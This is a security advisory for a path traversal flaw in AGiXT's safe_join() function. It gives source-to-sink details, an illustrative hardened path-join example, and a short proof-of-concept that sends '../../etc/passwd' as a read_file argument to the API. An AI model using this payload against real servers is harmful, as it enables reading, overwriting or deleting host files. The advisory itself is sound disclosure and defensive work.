GHSA-5gfj-64gh-mgmw

Source
https://github.com/advisories/GHSA-5gfj-64gh-mgmw
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-5gfj-64gh-mgmw/GHSA-5gfj-64gh-mgmw.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5gfj-64gh-mgmw
Aliases
  • CVE-2026-39981
Published
2026-04-08T20:02:01Z
Modified
2026-04-09T19:18:53.066512Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
AGiXT Vulnerable to Path Traversal in safe_join()
Details

Summary

The safe_join() function in the essential_abilities extension fails to validate that resolved file paths remain within the designated agent workspace. An authenticated attacker can use directory traversal sequences (`../`) to read, write, or delete arbitrary files on the server hosting the AGiXT instance.

Details

agixt/endpoints/Extension.py:165 (source) -> agixt/XT.py:1035 (hop) -> agixt/extensions/essential_abilities.py:436 (sink)

# source
command_args = command.command_args

# hop
response = await Extensions(...).execute_command(command_name=command_name, command_args=command_args)

# sink
new_path = os.path.normpath(os.path.join(self.WORKING_DIRECTORY, *paths.split("/")))
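The sink above collapses `..` segments with os.path.normpath but never checks that the result is still under WORKING_DIRECTORY. The following is an added example, not AGiXT's code or its fix: it places the vulnerable join beside a hardened variant that resolves both sides with realpath and compares path components with os.path.commonpath, and it also shows the symlink case that a purely lexical check misses. The workspace paths, the helper names (weak_join, hardened_join, escapes, symlink_escape_detected) and the secrets file are constructed for the demonstration.

```python
import os
import shutil
import tempfile


def weak_join(working_dir: str, paths: str) -> str:
    """Mirror of the vulnerable pattern: normpath collapses '..' lexically but
    nothing checks that the result is still under working_dir, so a request
    for '../../etc/passwd' resolves to a path outside the workspace."""
    return os.path.normpath(os.path.join(working_dir, *paths.split("/")))


def hardened_join(working_dir: str, paths: str) -> str:
    """Hardened variant (an illustration, not the project's own fix): resolve
    the workspace and the candidate with realpath so symlinks are followed,
    then require the workspace to be a prefix at the component level."""
    base = os.path.realpath(working_dir)
    candidate = os.path.realpath(os.path.join(base, *paths.split("/")))
    # commonpath compares whole components, so '/srv/ws' does not accept
    # '/srv/ws2/x' the way a naive str.startswith() check would.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes workspace: {paths!r}")
    return candidate


def escapes(working_dir: str, paths: str) -> bool:
    """True if the hardened check rejects the requested path."""
    try:
        hardened_join(working_dir, paths)
        return False
    except ValueError:
        return True


def symlink_escape_detected() -> bool:
    """Build a constructed workspace containing a symlink that points outside
    it. The lexical join stays 'inside' the workspace as a string, while the
    realpath-based check rejects the same request."""
    root = tempfile.mkdtemp()
    try:
        workspace = os.path.join(root, "WORKSPACE")
        secrets = os.path.join(root, "secrets")  # constructed, sits next to the workspace
        os.mkdir(workspace)
        os.mkdir(secrets)
        with open(os.path.join(secrets, "key.txt"), "w") as fh:
            fh.write("constructed secret\n")
        os.symlink(secrets, os.path.join(workspace, "link"))
        lexically_inside = weak_join(workspace, "link/key.txt").startswith(workspace)
        return lexically_inside and escapes(workspace, "link/key.txt")
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    ws = "/srv/agixt/WORKSPACE/MyAgent"  # constructed workspace path
    print("weak:    ", weak_join(ws, "../../../../etc/passwd"))
    print("hardened rejects traversal:", escapes(ws, "../../../../etc/passwd"))
    print("hardened accepts in-tree:  ", not escapes(ws, "notes/todo.txt"))
    print("symlink escape detected:   ", symlink_escape_detected())
```

The check is done on the fully resolved path rather than on the raw request because rejecting the literal string `..` is not enough: a symlink inside the workspace, or a workspace directory that is itself a symlink, changes where the final open() lands.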

PoC

# tested on: agixt<=1.9.1
# install: pip install agixt==1.9.1

import requests

BASE = "http://localhost:7437"   # default AGiXT API port
TOKEN = "<your_api_key>"         # any valid API key; no elevated role needed

headers = {"Authorization": f"Bearer {TOKEN}"}

# The filename is joined onto the agent workspace and only normalised,
# so the "../" segments walk out of the workspace before the file is read.
# The number of "../" needed depends on how deep the workspace sits on the host.
payload = {
    "command_name": "read_file",
    "command_args": {
        "filename": "../../etc/passwd"
    }
}

r = requests.post(f"{BASE}/api/agent/MyAgent/command", json=payload, headers=headers)
print(r.text)
# expected output: root:x:0:0:root:/root:/bin/bash ...

Impact

Authenticated users can read, overwrite, or delete arbitrary files on the host server, enabling credential theft, persistent code execution, or denial of service. Authentication is required, but no privileges beyond a valid API key are needed.

Database specific
{
    "nvd_published_at": "2026-04-09T18:17:02Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-22"
    ],
    "github_reviewed_at": "2026-04-08T20:02:01Z"
}
References

Affected packages

PyPI / agixt

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.9.2

Affected versions

1.*
1.1.43b0
1.1.44b0
1.1.45b0
1.1.46b0
1.1.47b0
1.1.48b0
1.1.49b0
1.1.50b0
1.1.51b0
1.1.52b0
1.1.54b0
1.1.55b0
1.1.56b0
1.1.57b0
1.1.58b0
1.1.59b0
1.1.60b0
1.1.61b0
1.1.62b0
1.1.63b0
1.1.64b0
1.1.65b0
1.1.66b0
1.1.67b0
1.1.68b0
1.1.69b0
1.1.70b0
1.1.71b0
1.1.72b0
1.1.73b0
1.1.74b0
1.1.75b0
1.1.76b0
1.1.77b0
1.1.78b0
1.1.79b0
1.1.80b0
1.1.81b0
1.1.82b0
1.1.83b0
1.1.84b0
1.2.0b0
1.2.0
1.2.1b0
1.2.3
1.2.4
1.2.5
1.2.6
1.2.7
1.2.8
1.2.9
1.2.10
1.2.11
1.2.12
1.2.13
1.2.14
1.2.15
1.2.16
1.2.17
1.2.18
1.2.19
1.2.20
1.2.21
1.2.23
1.2.24
1.2.25
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.3.6
1.3.7
1.3.8
1.3.9
1.3.10
1.3.11
1.3.12
1.3.13
1.3.14
1.3.15
1.3.16
1.3.17
1.3.18
1.3.19
1.3.20
1.3.21
1.3.22
1.3.23
1.3.24
1.3.25
1.3.26
1.3.27
1.3.28
1.3.29
1.3.30
1.3.31
1.3.32
1.3.33
1.3.34
1.3.35
1.3.36
1.3.37
1.3.38
1.3.39
1.3.40
1.3.41
1.3.42
1.3.43
1.3.44
1.3.45
1.3.46
1.3.47
1.3.48
1.3.49
1.3.50
1.3.51
1.3.52
1.3.53
1.3.54
1.3.55
1.3.56
1.3.57
1.3.58
1.3.59
1.3.60
1.3.61
1.3.62
1.3.63
1.3.64
1.3.65
1.3.66
1.3.67
1.3.68
1.3.69
1.3.70
1.3.71
1.3.72
1.3.73
1.3.74
1.3.75
1.3.76
1.3.77
1.3.78
1.3.79
1.3.80
1.3.81
1.3.82
1.3.83
1.3.84
1.3.85
1.3.86
1.3.87
1.3.88
1.3.89
1.3.90
1.3.91
1.3.92
1.3.93
1.3.94
1.3.95
1.3.96
1.3.97
1.3.98
1.3.99
1.3.100
1.3.101
1.3.102
1.3.103
1.3.104
1.3.105
1.3.106
1.3.107
1.3.108
1.3.109
1.3.110
1.3.111
1.3.112
1.3.113
1.3.114
1.3.115
1.3.116
1.3.117
1.3.118
1.3.119
1.3.120
1.3.121
1.3.122
1.3.123
1.3.124
1.3.125
1.3.126
1.3.127
1.3.128
1.3.129
1.3.130
1.3.131
1.3.132
1.3.133
1.3.134
1.3.135
1.3.136
1.3.137
1.3.138
1.3.139
1.3.140
1.3.141
1.3.142
1.3.143
1.3.144
1.3.145
1.3.146
1.3.147
1.3.148
1.3.149
1.3.150
1.3.151
1.3.152
1.3.153
1.3.154
1.3.155
1.4.0
1.4.1
1.4.2
1.4.3
1.4.4
1.4.5
1.4.6
1.4.7
1.4.8
1.4.9
1.4.10
1.4.11
1.4.12
1.4.13
1.4.14
1.4.15
1.4.16
1.4.17
1.4.18
1.4.19
1.4.20
1.4.21
1.4.22
1.4.24
1.4.25
1.4.26
1.4.27
1.4.28
1.4.29
1.4.30
1.4.31
1.4.32
1.4.33
1.4.34
1.4.35
1.4.36
1.4.37
1.4.38
1.4.39
1.4.40
1.4.41
1.4.42
1.4.43
1.4.44
1.4.45
1.4.46
1.4.47
1.4.48
1.4.49
1.4.50
1.4.51
1.4.52
1.4.53
1.4.54
1.4.55
1.4.57
1.4.58
1.4.59
1.4.60
1.4.61
1.4.62
1.4.63
1.4.64
1.4.65
1.5.0
1.5.1
1.5.2
1.5.3
1.5.4
1.5.5
1.5.6
1.5.7
1.5.8
1.5.9
1.5.10
1.5.11
1.5.12
1.5.13
1.5.14
1.5.15
1.5.16
1.5.17
1.5.18
1.6.0
1.6.1
1.6.2
1.6.3
1.6.5
1.6.6
1.6.7
1.6.8
1.6.9
1.6.10
1.6.11
1.6.12
1.6.13
1.6.14
1.6.15
1.6.16
1.6.17
1.6.18
1.6.19
1.6.20
1.6.21
1.6.22
1.6.23
1.6.24
1.6.25
1.6.26
1.6.27
1.6.28
1.6.29
1.6.30
1.6.31
1.7.0
1.7.1
1.7.2
1.7.3
1.7.4
1.7.5
1.7.6
1.7.7
1.7.8
1.7.9
1.7.10
1.7.11
1.7.12
1.7.13
1.7.14
1.8.0
1.8.1
1.8.2
1.9.0
1.9.1

Database specific

last_known_affected_version_range
"<= 1.9.1"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-5gfj-64gh-mgmw/GHSA-5gfj-64gh-mgmw.json"